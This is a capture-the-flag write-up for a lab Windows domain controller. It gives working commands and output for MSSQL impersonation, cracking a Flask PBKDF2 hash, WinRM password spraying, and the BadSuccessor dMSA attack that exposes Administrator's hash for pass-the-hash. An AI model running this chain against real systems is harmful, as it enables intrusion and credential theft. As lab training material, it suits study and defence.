by 0xW1LD
As is common in real-life Windows penetration tests, you start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!
As usual we start off with an nmap port scan:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.146.140:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.146.140:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-11-16T08:48:15+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-16T07:25:34
| Not valid after: 2055-11-16T07:25:34
| MD5: 321f:3620:5365:3c5e:d4fd:dc1a:d666:39d1
| SHA-1: 55bd:2897:3106:99be:7eda:5081:6e43:08da:67e2:ad7b
| -----BEGIN CERTIFICATE-----
| MIIEADCCAmigAwIBAgIQWAuQSaqN169EakYxp44TQTANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUxMTE2MDcyNTM0WhgPMjA1NTExMTYwNzI1MzRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBALr37Sqe
| +4Uy1wtJsHiJ2mHqaNkA+/5ACRmDF7o8oQ9l5f3/sJgJpIeZXbqbL9zpVmBmy5go
| rpGSCqrOFcP3y6hW8d9cg88JulX7pKl+Wpg9e1ruFjeUwSCdJBTTYmS0YUq/0yqT
| oWR8xcpoYbuJcbQh/uXT5h5ALrdPBqWDtuITtScDkv47ChodZeoIhmxc83xouQm+
| eZdWb24UTZF9WM6HzFIV5do4F+bkVANc2modF+2pjwFSZ//yyLRI9Q9oaokio2Y6
| yBLl42k5s2dnq7AArorgn8rx6NPJY/iqxJ71P37hznb9rLJxT2fzJ/eCCgk09lUm
| UCTes4oeH/fchUM4jjg4wwNG2brWNiSJZ8Xi7e+5wp7GZb+nybFrOAoQwOvcvQay
| xOZpQFATEJBeWQWaO0NYjKDn1B+6pZs6/3Hhh97O36XWbvJYBpWgUheXj1qEmJ+j
| Hw2z67dKG/sBj1uPjZjgYSyi5xPE9ruEIjsqegW//PxFFhR5MtS7qfzU/QIDAQAB
| MA0GCSqGSIb3DQEBCwUAA4IBgQB87vxxjJvv54Yk2e0vP+4iNCdW8bzCGBpH0WcN
| gA40ImgBMlh7E63kmM1EweGv0C3sif0Eex0/C5cRe0muufMgVQOVwjoT2nlS9sCI
| zv04HozhOXK7QLfQdz4XmILvJ0DZUXmNRhFdy/BDQE3GkZ3ihcAeV3qKSpDS7nAC
| 4YewEwq3gDCZqLr2SBqRqKmkrBELGBbFsMyt06SiOP/Q+aq9wlWbpXdRfxZNz0Pl
| 17VzmQDxnPZx3fLAhTYvZ3DoBeqUGWUfqsd7K4KWJsnGcXLMyAhpa1EMf5Ka2S95
| pg6nUyM6U+wRdPVZxTF02YIs2GV40ReBtuKZyKlxvUuwBWLg9jAa8CdVlNPwCaBJ
| HO21Bi/1PfFOGLSEuoH258P/lO6g3OkPVcSU4i+hjQUAG82NWOsMg2t9pABl855d
| AS+t0bq9TsHc8x/tebLQxM7RhPqbq4U5CIhXeQkD21W8mXqUxMsG/X73zD5g8LTK
| Z0H3WjhiRDGvr8SSs4p2al8Cbfc=
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m55s
Only a few ports are exposed, even though this is a Domain Controller:
80 - HTTP (IIS 10.0)
1433 - MSSQL (SQL Server 2022)
5985 - WinRM (HTTP)
Let's add the domain to /etc/hosts and try a RID brute-force over MSSQL to enumerate users and groups. kevin turns out to be a local SQL login rather than a domain account (note the DC01\kevin in the output), hence --local-auth:
nxc mssql 'dc01.eighteen.htb' -u 'kevin' -p 'iNa2we6haRj2gaw!' --rid-brute 10000 --local-auth
MSSQL 10.129.146.140 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.146.140 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.146.140 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.146.140 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.146.140 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.146.140 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.146.140 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.146.140 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.146.140 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.146.140 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.146.140 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.146.140 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.146.140 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.146.140 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.146.140 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.146.140 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.146.140 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.146.140 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.146.140 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.146.140 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.146.140 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.146.140 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.146.140 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.146.140 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.146.140 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.146.140 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.146.140 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.146.140 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.146.140 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.146.140 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.146.140 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.146.140 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.146.140 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.146.140 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.146.140 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.146.140 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.146.140 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.146.140 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.146.140 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.146.140 1433 DC01 1612: EIGHTEEN\dave.green
Since we can authenticate to MSSQL, let's get an interactive SQL shell using mssqlclient.py from the impacket example scripts (kevin is a SQL login, so this is SQL authentication, not Windows/Kerberos auth):
mssqlclient.py 'eighteen.htb/kevin:iNa2we6haRj2gaw!@dc01.eighteen.htb'
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin guest@master)>
Enumerating the databases we can find the financial_planner database, which we currently don’t have any access on.
SQL (kevin guest@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
Enumerating logins and impersonation grants shows that kevin holds IMPERSONATE on the appdev login (granted by appdev itself), so we can switch to that login:
SQL (kevin guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------ --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
kevin SQL_LOGIN 0 0 0 0 0 0 0 0 0
appdev SQL_LOGIN 0 0 0 0 0 0 0 0 0
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
As the appdev login we're able to access the financial_planner database:
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)>
Listing the tables, there is a users table, which is always interesting because application user tables usually hold password hashes:
SQL (appdev appdev@financial_planner)> select * from INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
----------------- ------------ ----------- ----------
financial_planner dbo users b'BASE TABLE'
financial_planner dbo incomes b'BASE TABLE'
financial_planner dbo expenses b'BASE TABLE'
financial_planner dbo allocations b'BASE TABLE'
financial_planner dbo analytics b'BASE TABLE'
financial_planner dbo visits b'BASE TABLE'
Dumping the table gives us a single admin account whose password_hash is a PBKDF2-HMAC-SHA256 hash in Werkzeug's format (what Flask's generate_password_hash produces): pbkdf2:sha256:<iterations>$<salt>$<hex digest>.
SQL (appdev appdev@financial_planner)> select * from users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$[REDACTED] 1 2025-10-29 05:39:03
Let's convert this into something hashcat understands (mode 10900, PBKDF2-HMAC-SHA256, which expects sha256:<iterations>:<base64 salt>:<base64 digest>) using the technique shown by Ben Heater in his notes on PBKDF2-HMAC-SHA256. The digest is hex, so it is hex-decoded and re-encoded as base64:
echo -n '[REDACTED]' | xxd -r -p | base64
BnOtk[REDACTED]
echo 'sha256:600000:AMtzteQIG7yAbZIa:BnOtk[REDACTED]' > adminConverted.pem
However hashcat doesn't crack it. Checking the salt, base64-decoding it yields a leading null byte, which would be an odd choice for a salt; that suggests the salt field isn't base64 at all, contrary to what Ben Heater's notes assume for this format. Werkzeug feeds the ASCII salt string straight into PBKDF2 as raw bytes.
echo 'AMtzteQIG7yAbZIa' | base64 -d | xxd
00000000: 00cb 73b5 e408 1bbc 806d 921a ..s......m.
So instead, base64-encode the ASCII salt string itself (so hashcat decodes it back to the same bytes Werkzeug used) and try that with hashcat:
echo -n 'AMtzteQIG7yAbZIa' | base64
QU10enRlUUlHN3lBYlpJYQ==
echo 'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtk[REDACTED]' > adminConverted.pem
hashcat -m 10900 -a 0 adminConverted.pem /usr/share/wordlists/rockyou.txt.gz
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-AMD Ryzen 7 5800H with Radeon Graphics, 2222/4445 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory allocated for this attack: 514 MB (3232 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt.gz
* Passwords.: 14344385
* Bytes.....: 53357329
* Keyspace..: 14344385
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtk[REDACTED]:[REDACTED]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7Gd...yIcTM=
Time.Started.....: Sat Nov 15 21:19:11 2025 (7 secs)
Time.Estimated...: Sat Nov 15 21:19:18 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 171 H/s (12.27ms) @ Accel:167 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1336/14344385 (0.01%)
Rejected.........: 0/1336 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599000-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> buster1
Started: Sat Nov 15 21:19:10 2025
Stopped: Sat Nov 15 21:19:20 2025
Success! We've cracked the hash. Let's spray it over WinRM against everything the RID brute returned. users.txt is that raw list, so it also contains groups and the machine account, which simply fail; on a real engagement, trim it to user accounts and check the lockout policy before spraying:
nxc winrm 'dc01.eighteen.htb' -u users.txt -p '[REDACTED]' --continue-on-success
WINRM 10.129.146.140 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Enterprise Read-only Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Administrator:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Guest:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\krbtgt:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Users:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Guests:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Computers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Cert Publishers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Schema Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Enterprise Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Group Policy Creator Owners:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Read-only Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Cloneable Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Protected Users:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Key Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Enterprise Key Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Forest Trust Accounts:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\External Trust Accounts:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\RAS and IAS Servers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Allowed RODC Password Replication Group:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Denied RODC Password Replication Group:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\DC01$:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\DnsAdmins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\DnsUpdateProxy:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\mssqlsvc:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\SQLServer2005SQLBrowserUser$DC01:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\HR:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\IT:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Finance:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\jamie.dunn:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\jane.smith:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\alice.jones:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [+] eighteen.htb\adam.scott:[REDACTED] (Pwn3d!)
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\bob.brown:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\carol.white:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\dave.green:[REDACTED]
We have a successful authentication for adam.scott! Let's WinRM into the machine:
winrmexec.py 'eighteen.htb/adam.scott:[REDACTED]@dc01.eighteen.htb'
/home/kali/.cache/uv/environments-v2/winrmexec-8aa50ec8544e68a3/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.eighteen.htb
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://dc01.eighteen.htb:5985/wsman
PS C:\Users\adam.scott\Documents> ls ../Desktop
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/15/2025 11:24 PM 34 user.txt
Just like that, we have User!
Enumerating the domain from here is awkward: LDAP, Kerberos and SMB are not reachable from the outside (nmap only showed 80, 1433 and 5985), so I port-forwarded 389, 88 and 445 through the WinRM foothold and pointed dc01.eighteen.htb at the loopback address in /etc/hosts so the tooling below talks to the tunnel.
Checking what adam.scott can write to, we have CREATE_CHILD on the Staff OU:
bloodyAD -d eighteen.htb -H localhost -u 'adam.scott' -p "$PASS" get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=eighteen,DC=htb
permission: WRITE
distinguishedName: OU=Staff,DC=eighteen,DC=htb
permission: CREATE_CHILD
distinguishedName: CN=adam.scott,OU=Staff,DC=eighteen,DC=htb
permission: WRITE
The SMB banner also confirms that the DC is running Windows Server 2025 (build 26100), even though it hosts SQL Server 2022:
nxc smb 'dc01.eighteen.htb' -u 'adam.scott' -p "$PASS"
SMB 127.0.0.1 445 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] eighteen.htb\adam.scott:[REDACTED]
This is crucial information: Windows Server 2025 introduced a new account type, the delegated Managed Service Account (dMSA), and the BadSuccessor research (Abusing dMSA to Escalate Privileges in Active Directory) shows how to abuse it. Anyone who can create child objects in an OU can create a dMSA there and set its msDS-ManagedAccountPrecededByLink to an arbitrary account; the KDC then treats the dMSA as that account's successor, so the dMSA's tickets carry the target's privileges and the TGS reply includes the target's current keys. CREATE_CHILD on the Staff OU is exactly what we have.
Let's run the BadSuccessor attack with bloodyAD, creating a dMSA under the Staff OU that supersedes Administrator:
bloodyAD -H dc01.eighteen.htb -d eighteen.htb -u 'adam.scott' -p "$PASS" add badSuccessor -t "CN=Administrator,CN=Users,DC=eighteen,DC=htb" --ou "OU=Staff,DC=eighteen,DC=htb" w1ld_bad
[+] Creating DMSA w1ld_bad$ in OU=Staff,DC=eighteen,DC=htb
[+] Impersonating: CN=Administrator,CN=Users,DC=eighteen,DC=htb
Clock skew detected. Adjusting local time by 7:01:25.978562. Retrying operation.
[+]
Realm : EIGHTEEN.HTB
Sname : krbtgt/EIGHTEEN.HTB
UserName : w1ld_bad$
UserRealm : eighteen.htb
StartTime : 2025-12-23 13:23:17+00:00
EndTime : 2025-12-23 23:23:16+00:00
RenewTill : 2025-12-24 13:23:16+00:00
Flags : forwardable, enc-pa-rep, renewable, pre-authent
Keytype : 18
Key : y1utsCCMg0tdtl/gNwC+qkIajjoGQwh/GSEPOAfoxpU=
EncodedKirbi :
doIF3TCCBdmgAwIBBaEDAgEWooIE0DCCBMxhggTIMIIExKADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRn
[REDACTED]
[+] dMSA TGT stored in ccache file w1ld_bad_IY.ccache
[+]
dMSA current keys found in TGS:
[+] AES256: 480b8d5308befceb976d24b91b73771592bad1bf1d20636e202eaa5ea5cbe0ec
[+] AES128: 5a5d12ebd4c8ec6858021de2ad0b8a0b
[+] RC4: 20c3133[REDACTED]
[+]
dMSA previous keys found in TGS (including keys of preceding managed accounts):
[+] RC4: 0b133be956bfadd[REDACTED]
You may be experiencing an error in bloodyAD wherein it's attempting to encode a list, or an error regarding compatible_dcs; update your version of bloodyAD, as these issues are fixed in 2.5.1. In later versions you might have to use the --prepatch flag, as the badSuccessor attack has changed.
The "previous" RC4 key in the TGS belongs to the superseded account, i.e. it is Administrator's NT hash, so we can pass the hash straight to nxc:
nxc smb 'dc01.eighteen.htb' -u 'Administrator' -H "$HASH" -x 'dir "C:/Users/Administrator/Desktop"'
SMB 127.0.0.1 445 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] eighteen.htb\Administrator:0b13[REDACTED] (Pwn3d!)
SMB 127.0.0.1 445 DC01 [+] Executed command via atexec
SMB 127.0.0.1 445 DC01 Volume in drive C has no label.
SMB 127.0.0.1 445 DC01 Volume Serial Number is E154-392A
SMB 127.0.0.1 445 DC01 Directory of C:\Users\Administrator\Desktop
SMB 127.0.0.1 445 DC01 11/10/2025 04:39 PM <DIR> .
SMB 127.0.0.1 445 DC01 11/10/2025 02:15 PM <DIR> ..
SMB 127.0.0.1 445 DC01 12/23/2025 04:44 AM 34 root.txt
SMB 127.0.0.1 445 DC01 1 File(s) 34 bytes
SMB 127.0.0.1 445 DC01 2 Dir(s) 5,557,919,744 bytes free
Just like that, we have Root!
tags: boxes - os/windows - diff/easy